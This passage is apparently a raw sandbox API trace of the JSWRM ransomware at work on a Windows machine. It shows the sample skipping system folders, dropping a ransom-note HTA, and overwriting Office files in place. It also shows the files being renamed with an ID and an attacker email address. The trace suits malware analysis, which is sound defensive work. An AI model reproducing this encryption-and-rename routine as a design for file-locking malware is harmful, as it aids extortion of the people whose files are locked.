lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\MSO.ACL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\3082\\mso.acl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0122.805] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc57c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSO.ACL", cAlternateFileName="")) returned 0 [0122.805] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0122.805] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessWeb", cAlternateFileName="ACCESS~1")) returned 1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2=".") returned 1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="..") returned 1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="...") returned 1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="windows") returned -1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="recovery") returned -1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="perflogs") returned -1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="documents and settings") returned -1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="$RECYCLE.BIN") returned 1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="system volume information") returned -1 [0122.805] lstrcmpiW (lpString1="AccessWeb", lpString2="msocache") returned -1 [0122.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0122.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0122.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0122.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b2b8 [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0122.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\jswrm-decrypt.hta")) returned 0xffffffff [0122.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0122.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0122.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0122.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0122.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24e1d8 [0122.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0122.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0122.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b380 [0122.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0122.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0122.809] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.809] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0122.810] CloseHandle (hObject=0x45c) returned 1 [0122.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0122.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0122.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0122.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0122.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0122.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0122.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bf38 [0122.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0122.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\jswrm-decrypt.hta")) returned 0x20 [0122.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0122.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0122.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0122.810] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x12985c4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fdba932, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName=".", cAlternateFileName="")) returned 0x232240 [0122.810] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.810] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x12985c4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fdba932, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="..", cAlternateFileName="")) returned 1 [0122.810] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.810] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.810] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1295fc19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1295fc19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x415, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="CLNTWRAP.HTM", cAlternateFileName="")) returned 1 [0122.810] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2=".") returned 1 [0122.810] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="..") returned 1 [0122.810] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="...") returned 1 [0122.810] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="windows") returned -1 [0122.811] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="recovery") returned -1 [0122.811] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="perflogs") returned -1 [0122.811] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="documents and settings") returned -1 [0122.811] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="$RECYCLE.BIN") returned 1 [0122.811] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="system volume information") returned -1 [0122.811] lstrcmpiW (lpString1="CLNTWRAP.HTM", lpString2="msocache") returned -1 [0122.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLNTWRAP.HTM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLNTWRAP.HTM", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLNTWRAP.HTM", lpUsedDefaultChar=0x0) returned 12 [0122.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLNTWRAP.HTM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLNTWRAP.HTM", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLNTWRAP.HTM", lpUsedDefaultChar=0x0) returned 12 [0122.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0122.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\CLNTWRAP.HTM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\clntwrap.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.812] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1045) returned 1 [0122.812] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x410) returned 0x230a00 [0122.812] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x410, lpOverlapped=0x0) returned 1 [0122.814] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.814] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x410, lpOverlapped=0x0) returned 1 [0122.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0122.814] CloseHandle (hObject=0x238) returned 1 [0122.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0122.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0122.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0122.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0122.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0122.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0122.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\CLNTWRAP.HTM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\clntwrap.htm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\CLNTWRAP.HTM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\clntwrap.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0122.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0122.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.815] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fdba932, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3fdba932, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3fdba932, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0122.815] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0122.815] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0122.815] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0122.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0122.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0122.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0122.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0122.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0122.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0122.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0122.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0122.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0122.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0122.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0122.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0122.816] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1295fc19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1295fc19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x104cb, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="RPT2HTM4.XSL", cAlternateFileName="")) returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2=".") returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="..") returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="...") returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="windows") returned -1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="recovery") returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="perflogs") returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="documents and settings") returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="$RECYCLE.BIN") returned 1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="system volume information") returned -1 [0122.816] lstrcmpiW (lpString1="RPT2HTM4.XSL", lpString2="msocache") returned 1 [0122.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPT2HTM4.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPT2HTM4.XSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPT2HTM4.XSL", lpUsedDefaultChar=0x0) returned 12 [0122.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0122.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPT2HTM4.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPT2HTM4.XSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPT2HTM4.XSL", lpUsedDefaultChar=0x0) returned 12 [0122.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0122.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0122.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\RPT2HTM4.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\rpt2htm4.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.817] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=66763) returned 1 [0122.817] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x104c0) returned 0x24e1d8 [0122.818] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x104c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x104c0, lpOverlapped=0x0) returned 1 [0122.824] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.824] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x104c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x104c0, lpOverlapped=0x0) returned 1 [0122.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.825] CloseHandle (hObject=0x238) returned 1 [0122.825] 